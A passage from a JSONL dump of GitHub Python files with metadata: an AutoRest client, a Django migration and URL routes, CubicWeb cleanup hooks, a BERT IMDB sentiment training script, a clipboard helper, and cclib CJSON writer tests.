required_global_path, # type: str\n required_global_query, # type: str\n optional_global_query=None, # type: Optional[int]\n base_url=None, # type: Optional[str]\n **kwargs # type: Any\n ):\n # type: (...) -> None\n if not base_url:\n base_url = 'http://localhost:3000'\n self._config = AutoRestRequiredOptionalTestServiceConfiguration(required_global_path, required_global_query, optional_global_query, **kwargs)\n self._client = PipelineClient(base_url=base_url, config=self._config, **kwargs)\n\n client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}\n self._serialize = Serializer(client_models)\n self._deserialize = Deserializer(client_models)\n\n self.implicit = ImplicitOperations(\n self._client, self._config, self._serialize, self._deserialize)\n self.explicit = ExplicitOperations(\n self._client, self._config, self._serialize, self._deserialize)\n\n def close(self):\n # type: () -> None\n self._client.close()\n\n def __enter__(self):\n # type: () -> AutoRestRequiredOptionalTestService\n self._client.__enter__()\n return self\n\n def __exit__(self, *exc_details):\n # type: (Any) -> None\n self._client.__exit__(*exc_details)\n", "repo_name": "Azure/autorest.azure-functions-python", "sub_path": "test/vanilla/Expected/AcceptanceTests/RequiredOptional/requiredoptional/_auto_rest_required_optional_test_service.py", "file_name": "_auto_rest_required_optional_test_service.py", "file_ext": "py", "file_size_in_byte": 2577, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 6, "usage_type": "name"}, {"api_name": "_configuration.AutoRestRequiredOptionalTestServiceConfiguration", "line_number": 44, "usage_type": "call"}, {"api_name": "azure.core.PipelineClient", "line_number": 45, "usage_type": "call"}, {"api_name": "msrest.Serializer", "line_number": 48, "usage_type": "call"}, {"api_name": "msrest.Deserializer", "line_number": 49, "usage_type": "call"}, {"api_name": "operations.ImplicitOperations", "line_number": 51, "usage_type": "call"}, {"api_name": "operations.ExplicitOperations", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "37790105831", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('zoho_integration', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='contact',\n name='membership_status',\n field=models.CharField(max_length=300, choices=[('Full', 'Full Membership'), ('Starving', 'Starving Hacker')]),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='contactchange',\n name='new_value',\n field=models.CharField(max_length=300, null=True, default='None'),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='contactchange',\n name='old_value',\n field=models.CharField(max_length=300, null=True, default='None'),\n preserve_default=True,\n ),\n ]\n", "repo_name": "dkoppel/ps1auth-1", "sub_path": "zoho_integration/migrations/0002_auto_20150216_2026.py", "file_name": "0002_auto_20150216_2026.py", "file_ext": "py", "file_size_in_byte": 972, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "74783460005", "text": "from datetime import timedelta, datetime\n\nfrom cubicweb.server import hook\n\nclass TransactionsCleanupStartupHook(hook.Hook):\n \"\"\"start task to cleanup transaction data\"\"\"\n __regid__ = 'cw.looping-tasks.transactions-cleanup'\n events = ('server_startup',)\n\n def __call__(self):\n if not self.repo.has_scheduler():\n return\n # XXX use named args and inner functions to avoid referencing globals\n # which may cause reloading pb\n lifetime = timedelta(days=self.repo.config['keep-transaction-lifetime'])\n def cleanup_old_transactions(repo=self.repo, lifetime=lifetime):\n mindate = datetime.utcnow() - lifetime\n with repo.internal_cnx() as cnx:\n cnx.system_sql(\n 'DELETE FROM transactions WHERE tx_time < %(time)s',\n {'time': mindate})\n cnx.commit()\n if self.repo.config['undo-enabled']:\n self.repo.looping_task(60*60*24, cleanup_old_transactions,\n self.repo)\n\nclass UpdateFeedsStartupHook(hook.Hook):\n \"\"\"start task to update datafeed based sources\"\"\"\n __regid__ = 'cw.looping-tasks.update-feeds'\n events = ('server_startup',)\n\n def __call__(self):\n if not self.repo.has_scheduler():\n return\n def update_feeds(repo):\n # take a list to avoid iterating on a dictionary whose size may\n # change\n for uri, source in repo.sources_by_uri.items():\n if (uri == 'system'\n or not repo.config.source_enabled(source)\n or not source.config['synchronize']):\n continue\n with repo.internal_cnx() as cnx:\n try:\n source.pull_data(cnx)\n except Exception as exc:\n cnx.exception('while trying to update feed %s', source)\n self.repo.looping_task(60, update_feeds, self.repo)\n\n\nclass DataImportsCleanupStartupHook(hook.Hook):\n \"\"\"start task to cleanup old data imports (ie datafeed import logs)\"\"\"\n __regid__ = 'cw.looping-tasks.dataimports-cleanup'\n events = ('server_startup',)\n\n def __call__(self):\n if not self.repo.has_scheduler():\n return\n def expire_dataimports(repo=self.repo):\n for uri, source in repo.sources_by_uri.items():\n if (uri == 'system'\n or not repo.config.source_enabled(source)):\n continue\n with repo.internal_cnx() as cnx:\n mindate = datetime.utcnow() - timedelta(seconds=source.config['logs-lifetime'])\n cnx.execute('DELETE CWDataImport X WHERE X start_timestamp < %(time)s',\n {'time': mindate})\n cnx.commit()\n self.repo.looping_task(60*60*24, expire_dataimports, self.repo)\n", "repo_name": "gurneyalex/cubicweb", "sub_path": "cubicweb/hooks/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 2930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cubicweb.server.hook.Hook", "line_number": 5, "usage_type": "attribute"}, {"api_name": "cubicweb.server.hook", "line_number": 5, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "name"}, {"api_name": "cubicweb.server.hook.Hook", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cubicweb.server.hook", "line_number": 27, "usage_type": "name"}, {"api_name": "cubicweb.server.hook.Hook", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cubicweb.server.hook", "line_number": 51, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "11587899991", "text": "from django.urls import path,include\n\nfrom .views import *\n\n\nurlpatterns=[\n #add Urls Actions\n path('add_student/', add_student.as_view(), name='add_student'),\n path('add_teacher/', add_teacher.as_view(), name='add_teacher'),\n path('add_course/', add_course.as_view(), name='add_course'),\n \n #List Urls Actions\n path('list_students/',student_list.as_view(),name=\"students_people\"),\n path('list_courses/',course_list.as_view(),name=\"courses_people\"),\n path('list_teachers/',teacher_list.as_view(),name=\"teachers_people\"),\n \n #Update Urls Actions\n path('update_course//', update_course.as_view(), name='update_course'),\n \n #Delete Urls Actions\n path('delete_student//', delete_student.as_view()),\n path('delete_teacher//', delete_teacher.as_view(), name=\"delete_teacher\"),\n path('delete_course//', delete_course.as_view()),\n \n #Login \n path('user-login/', UserLoginAPIView.as_view(), name='user_login_api'),\n path('student-login/', StudentLoginView.as_view(), name='student_login_api'),\n path('teacher-login/', TeacherLoginView.as_view(), name='teacher_login_api'),\n \n #Relations\n path('profesores//estudiantes/', TeacherStudent.as_view(), name='profesor-estudiantes'),\n\n #Get relations\n #path('teacher-student//', TeacherStudent.as_view(),name=\"teacher_student\"),\n path('estudiantes//cursos/', CursosEstudianteView.as_view(), name='cursos_estudiante'), \n path('agregar_curso_profesor_a_estudiante/', agregar_curso_profesor_a_estudiante, name='agregar_curso_profesor_a_estudiante'),\n\n path('agregar_curso_profesor/', agregar_curso_profesor, name='agregar_curso_profesor_a_estudiante'),\n path('profesor//cursos/', ProfesorCursosView.as_view(), name='cursos_profesores'), \n path('profesores//estudiantes/', ProfesorEstudiantes.as_view(), name='estudiantes_profesores'), \n \n #Account settings app\n path('',include('apps.account_settings.urls')),\n]", "repo_name": "Trycatch-tv/team-8-backend", "sub_path": "apps/administration_sc/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2199, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "73810327844", "text": "import re\nimport random\nimport time\nimport datetime\n\nimport pandas as pd\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\n\nfrom scipy import stats\nfrom transformers import BertTokenizer\nfrom transformers import BertForSequenceClassification, AdamW, BertConfig\nfrom transformers import get_linear_schedule_with_warmup\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\nfrom keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.datasets import imdb\nfrom sklearn.model_selection import train_test_split\n\ndef separator(text):\n return re.sub(pattern=\"|\\.|\\?|\\!\", string=text, repl=\" [SEP] \")\n\ndf = pd.read_csv('imdbdata.csv', header=0)\ndf.head(5)\ntexts = df.review\nclasses = df.sentiment\nclasses_oh = df.sentiment.apply(lambda x: 1 if x == 'positive' else 0)\nclasses_oh = classes_oh.values\n\ndef bert_tokenize(texts):\n return [tokenizer.tokenize(\"[CLS] \" + text + \" [SEP]\") for text in texts]\n\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)\ntokenized = bert_tokenize(texts)\nbert_ids = [tokenizer.convert_tokens_to_ids(tokens) for tokens in tokenized]\n\nnumber_of_tokens = np.array([len(bert_id) for bert_id in bert_ids])\nstats.describe(number_of_tokens)\n\nMAX_LEN = 512\npadded_bert_ids = pad_sequences(bert_ids, maxlen=MAX_LEN, dtype='long',\n\t\t\t\t\t\t\t\t\ttruncating='post', padding='post')\npadded_bert_ids[0]\n\nattention_masks = [] # \nfor seq in padded_bert_ids: # \n seq_mask = [float(i>0) for i in seq]\n attention_masks.append(seq_mask)\n\nX_train, X_test, y_train, y_test = \\\ntrain_test_split(padded_bert_ids, classes_oh, random_state=42, test_size=0.3)\n\nmasks_train, masks_test, _, _ = train_test_split(attention_masks, padded_bert_ids, \n random_state=42, test_size=0.3)\n\nX_train, X_val, y_train, y_val = \\\ntrain_test_split(X_train, y_train, random_state=42, test_size=0.1)\n\nmasks_train, masks_val, _, _ = train_test_split(masks_train, masks_train, \n random_state=42, test_size=0.1)\n\n\n\n\n# display(\n# f\"X_train: {X_train.shape}\",\n# f\"X_val: {X_val.shape}\",\n# f\"X_test: {X_test.shape}\",\n# f\"y_train: {y_train.shape}\",\n# f\"y_val: {y_val.shape}\",\n# f\"y_test: {y_test.shape}\",\n# f\"masks_train: {len(masks_train)}\",\n# f\"masks_val: {len(masks_val)}\",\n# f\"masks_test: {len(masks_test)}\",\n# )\n\ntrain_inputs = torch.tensor(X_train)\ntrain_labels = torch.tensor(y_train)\ntrain_masks = torch.tensor(masks_train)\nvalidation_inputs = torch.tensor(X_val)\nvalidation_labels = torch.tensor(y_val)\nvalidation_masks = torch.tensor(masks_val)\n\ntest_inputs = torch.tensor(X_test)\ntest_labels = torch.tensor(y_test)\ntest_masks = torch.tensor(masks_test)\n\nprint(train_inputs.shape)\nprint(train_labels.shape)\nprint(train_masks.shape)\nprint(validation_inputs.shape)\nprint(validation_labels.shape)\nprint(validation_masks.shape)\nprint(test_inputs.shape)\nprint(test_labels.shape)\nprint(test_masks.shape)\n\nBATCH_SIZE = 4\n\ntrain_data = TensorDataset(train_inputs, train_masks, train_labels)\ntrain_sampler = RandomSampler(train_data)\ntrain_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=BATCH_SIZE)\n\nvalidation_data = TensorDataset(validation_inputs, validation_masks, validation_labels)\nvalidation_sampler = SequentialSampler(validation_data)\nvalidation_dataloader = DataLoader(validation_data, sampler=validation_sampler, batch_size=BATCH_SIZE)\n\ntest_data = TensorDataset(test_inputs, test_masks, test_labels)\ntest_sampler = RandomSampler(test_data)\ntest_dataloader = DataLoader(test_data, sampler=test_sampler, batch_size=BATCH_SIZE)\n\ndevice = torch.device(\"cuda:0\")\n\nmodel = BertForSequenceClassification.from_pretrained(\"bert-base-uncased\", num_labels=2)\n\noptimizer = AdamW(model.parameters(),\n lr = 2e-5, # 학습률\n eps = 1e-8 # 0으로 나누는 것을 방지하기 위한 epsilon 값\n )\n\nepochs = 4\ntotal_steps = len(train_dataloader) * epochs\n\nscheduler = get_linear_schedule_with_warmup(optimizer, \n num_warmup_steps = 0,\n num_training_steps = total_steps)\n\n# 정확도 계산 함수\ndef flat_accuracy(preds, labels):\n \n pred_flat = np.argmax(preds, axis=1).flatten()\n labels_flat = labels.flatten()\n\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\n\n# 시간 표시 함수\ndef format_time(elapsed):\n\n # 반올림\n elapsed_rounded = int(round((elapsed)))\n \n # hh:mm:ss으로 형태 변경\n return str(datetime.timedelta(seconds=elapsed_rounded))\n \n\n# 재현을 위해 랜덤시드 고정\nseed_val = 42\nrandom.seed(seed_val)\nnp.random.seed(seed_val)\ntorch.manual_seed(seed_val)\ntorch.cuda.manual_seed_all(seed_val)\n\n# 그래디언트 초기화\nmodel.zero_grad()\n\n# 에폭만큼 반복\nfor epoch_i in range(0, epochs):\n \n # ========================================\n # Training\n # ========================================\n \n print(\"\")\n print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, epochs))\n print('Training...')\n\n # 시작 시간 설정\n t0 = time.time()\n\n # 로스 초기화\n total_loss = 0\n\n # 훈련모드로 변경\n model.train()\n \n # 데이터로더에서 배치만큼 반복하여 가져옴\n for step, batch in enumerate(train_dataloader):\n # 경과 정보 표시\n if step % 500 == 0 and not step == 0:\n elapsed = format_time(time.time() - t0)\n print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(train_dataloader), elapsed))\n\n # 배치를 GPU에 넣음\n batch = tuple(t.to(device) for t in batch)\n \n # 배치에서 데이터 추출\n b_input_ids, b_input_mask, b_labels = batch\n\n # Forward 수행 \n outputs = model(b_input_ids, \n token_type_ids=None, \n attention_mask=b_input_mask, \n labels=b_labels)\n \n # 로스 구함\n loss = outputs[0]\n\n # 총 로스 계산\n total_loss += loss.item()\n\n # Backward 수행으로 그래디언트 계산\n loss.backward()\n\n # 그래디언트 클리핑\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\n\n # 그래디언트를 통해 가중치 파라미터 업데이트\n optimizer.step()\n\n # 스케줄러로 학습률 감소\n scheduler.step()\n\n # 그래디언트 초기화\n model.zero_grad()\n\n # 평균 로스 계산\n avg_train_loss = total_loss / len(train_dataloader) \n\n print(\"\")\n print(\" Average training loss: {0:.2f}\".format(avg_train_loss))\n print(\" Training epcoh took: {:}\".format(format_time(time.time() - t0)))\n \n # ========================================\n # Validation\n # ========================================\n\n print(\"\")\n print(\"Running Validation...\")\n\n #시작 시간 설정\n t0 = time.time()\n\n # 평가모드로 변경\n model.eval()\n\n # 변수 초기화\n eval_loss, eval_accuracy = 0, 0\n nb_eval_steps, nb_eval_examples = 0, 0\n\n # 데이터로더에서 배치만큼 반복하여 가져옴\n for batch in validation_dataloader:\n # 배치를 GPU에 넣음\n batch = tuple(t.to(device) for t in batch)\n \n # 배치에서 데이터 추출\n b_input_ids, b_input_mask, b_labels = batch\n \n # 그래디언트 계산 안함\n with torch.no_grad(): \n # Forward 수행\n outputs = model(b_input_ids, \n token_type_ids=None, \n attention_mask=b_input_mask)\n \n # 로스 구함\n logits = outputs[0]\n\n # CPU로 데이터 이동\n logits = logits.detach().cpu().numpy()\n label_ids = b_labels.to('cpu').numpy()\n \n # 출력 로짓과 라벨을 비교하여 정확도 계산\n tmp_eval_accuracy = flat_accuracy(logits, label_ids)\n eval_accuracy += tmp_eval_accuracy\n nb_eval_steps += 1\n\n print(\" Accuracy: {0:.2f}\".format(eval_accuracy/nb_eval_steps))\n print(\" Validation took: {:}\".format(format_time(time.time() - t0)))\n\nprint(\"\")\nprint(\"Training complete!\")\n\n\n\n# test\n\n#시작 시간 설정\nt0 = time.time()\n\n# 평가모드로 변경\nmodel.eval()\n\n# 변수 초기화\neval_loss, eval_accuracy = 0, 0\nnb_eval_steps, nb_eval_examples = 0, 0\n\n# 데이터로더에서 배치만큼 반복하여 가져옴\nfor step, batch in enumerate(test_dataloader):\n # 경과 정보 표시\n if step % 100 == 0 and not step == 0:\n elapsed = format_time(time.time() - t0)\n print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(test_dataloader), elapsed))\n\n # 배치를 GPU에 넣음\n batch = tuple(t.to(device) for t in batch)\n \n # 배치에서 데이터 추출\n b_input_ids, b_input_mask, b_labels = batch\n \n # 그래디언트 계산 안함\n with torch.no_grad(): \n # Forward 수행\n outputs = model(b_input_ids, \n token_type_ids=None, \n attention_mask=b_input_mask)\n \n # 로스 구함\n logits = outputs[0]\n\n # CPU로 데이터 이동\n logits = logits.detach().cpu().numpy()\n label_ids = b_labels.to('cpu').numpy()\n \n # 출력 로짓과 라벨을 비교하여 정확도 계산\n tmp_eval_accuracy = flat_accuracy(logits, label_ids)\n eval_accuracy += tmp_eval_accuracy\n nb_eval_steps += 1\n\nprint(\"\")\nprint(\"Accuracy: {0:.2f}\".format(eval_accuracy/nb_eval_steps))\nprint(\"Test took: {:}\".format(format_time(time.time() - t0)))", "repo_name": "jangsejong/STUDY", "sub_path": "keras_Dacon/news/BERT_IMDB_.py", "file_name": "BERT_IMDB_.py", "file_ext": "py", "file_size_in_byte": 9808, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer.from_pretrained", "line_number": 33, "usage_type": "call"}, {"api_name": "transformers.BertTokenizer", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.stats.describe", "line_number": 38, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 38, "usage_type": "name"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 53, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 57, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.utils.data.RandomSampler", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.utils.data.TensorDataset", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.utils.data.RandomSampler", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 112, "usage_type": "call"}, {"api_name": "transformers.BertForSequenceClassification.from_pretrained", "line_number": 114, "usage_type": "call"}, {"api_name": "transformers.BertForSequenceClassification", "line_number": 114, "usage_type": "name"}, {"api_name": "transformers.AdamW", "line_number": 116, "usage_type": "call"}, {"api_name": "transformers.get_linear_schedule_with_warmup", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 143, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 151, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 168, "usage_type": "call"}, {"api_name": "time.time", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 205, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 221, "usage_type": "call"}, {"api_name": "time.time", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 249, "usage_type": "call"}, {"api_name": "time.time", "line_number": 268, "usage_type": "call"}, {"api_name": "time.time", "line_number": 278, "usage_type": "call"}, {"api_name": "time.time", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 301, "usage_type": "call"}, {"api_name": "time.time", "line_number": 321, "usage_type": "call"}]} +{"seq_id": "16242576285", "text": "from collections import deque\n\nfrom pynput import keyboard;\n\nimport clipboard as clipboard;\nfrom src.providers.KeyboardProvider import KeyboardProvider\n\nimport src.utils.logger as logger;\n\nclass ClipboardProvider():\n def __init__(self):\n self.buffer = deque(5*[0], 5);\n self.keyboard = KeyboardProvider()\n\n def copy(self, *args):\n # Save existing clipboard value to keep original state\n original = clipboard.paste();\n\n self.pressCopy()\n\n # Save newly copied value to internal buffer\n copied = clipboard.paste();\n\n # Restore clipboard state\n clipboard.copy(original);\n\n if (\n not copied\n or copied.isspace()\n or copied == original\n ):\n return;\n\n self.buffer.append(copied);\n\n def paste(self, *args):\n\n # Fetch copied value from buffer\n copied = None;\n try:\n copied = self.buffer.pop();\n except IndexError:\n logger.log(\"FunctionProvider: Notice -> Nothing to paste\");\n return;\n\n if not copied or copied.isspace():\n return;\n\n # Save existing clipboard value to keep original state\n original = clipboard.paste();\n\n clipboard.copy(copied);\n\n # Paste\n self.pressPaste();\n\n # Restore clipboard state\n clipboard.copy(original);\n\n def save(self, structure):\n self.buffer.append(structure);\n\n def pressCopy(self, *args):\n self.keyboard.pressWithModifier('c', keyboard.Key.ctrl_l)\n\n def pressPaste(self, *args):\n self.keyboard.pressWithModifier('v', keyboard.Key.ctrl_l)\n", "repo_name": "lphaap/acrux", "sub_path": "src/providers/ClipboardProvider.py", "file_name": "ClipboardProvider.py", "file_ext": "py", "file_size_in_byte": 1655, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 12, "usage_type": "call"}, {"api_name": "src.providers.KeyboardProvider.KeyboardProvider", "line_number": 13, "usage_type": "call"}, {"api_name": "clipboard.paste", "line_number": 17, "usage_type": "call"}, {"api_name": "clipboard.paste", "line_number": 22, "usage_type": "call"}, {"api_name": "clipboard.copy", "line_number": 25, "usage_type": "call"}, {"api_name": "src.utils.logger.log", "line_number": 43, "usage_type": "call"}, {"api_name": "src.utils.logger", "line_number": 43, "usage_type": "name"}, {"api_name": "clipboard.paste", "line_number": 50, "usage_type": "call"}, {"api_name": "clipboard.copy", "line_number": 52, "usage_type": "call"}, {"api_name": "clipboard.copy", "line_number": 58, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 64, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "72785609764", "text": "import json\nimport os\nimport unittest\nfrom math import sqrt\n\nimport cclib\n\n__filedir__ = os.path.dirname(__file__)\n__filepath__ = os.path.realpath(__filedir__)\n__datadir__ = os.path.join(__filepath__, \"..\", \"..\")\n\n\nclass CJSONWriterTest(unittest.TestCase):\n \"\"\"Unit tests for the CJSON writer.\"\"\"\n\n def test_init(self):\n \"\"\"Does the class initialize correctly?\"\"\"\n fpath = os.path.join(__datadir__, \"data/ADF/basicADF2007.01/dvb_gopt.adfout\")\n data = cclib.io.ccread(fpath)\n cjson = cclib.io.cjsonwriter.CJSON(data)\n\n # The object should keep the ccData instance passed to its constructor.\n assert cjson.ccdata == data\n\n def test_cjson_generation(self):\n \"\"\"Does the CJSON format get generated properly?\"\"\"\n fpath = os.path.join(__datadir__, \"data/ADF/basicADF2007.01/NH3.adfout\")\n data = cclib.io.ccread(fpath)\n\n cjson = cclib.io.cjsonwriter.CJSON(data).generate_repr()\n\n # The data available in the cjson and ccdata objects should be equal.\n json_data = json.loads(cjson)\n number_of_atoms = json_data['properties']['number of atoms']\n assert number_of_atoms == data.natom\n\n dipole_moment = json_data['properties']['total dipole moment']\n assert round(abs(dipole_moment - sqrt(sum(data.moments[1] ** 2))), 7) == 0\n\n # Ensure the bond connectivity index starts from 0\n bonds = json_data.get('bonds', None)\n assert bonds is not None\n indices = bonds['connections']['index']\n assert min(indices) == 0\n assert max(indices) < number_of_atoms\n\n def test_zero_dipole_moment(self):\n \"\"\"Does the CJSON writer handle zero dipole moment correctly?\"\"\"\n fpath = os.path.join(__datadir__, \"data/GAMESS/basicGAMESS-US2017/C_bigbasis.out\")\n data = cclib.io.ccopen(fpath).parse()\n\n cjson = cclib.io.cjsonwriter.CJSON(data).generate_repr()\n\n json_data = json.loads(cjson)\n assert round(abs(json_data[\"properties\"]['total dipole moment']), 7) == 0\n\n def test_missing_dipole_moment(self):\n \"\"\"Does the CJSON writer handle missing properties correctly?\"\"\"\n fpath = os.path.join(__datadir__, \"data/GAMESS/basicGAMESS-US2017/C_bigbasis.out\")\n data = cclib.io.ccopen(fpath).parse()\n del data.moments\n\n cjson = cclib.io.cjsonwriter.CJSON(data).generate_repr()\n\n json_data = json.loads(cjson)\n assert \"total dipole moment\" not in json_data[\"properties\"]\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "repo_name": "cclib/cclib", "sub_path": "test/io/testcjsonwriter.py", "file_name": "testcjsonwriter.py", "file_ext": "py", "file_size_in_byte": 2538, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 286, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cclib.io.ccread", "line_number": 19, "usage_type": "call"}, {"api_name": 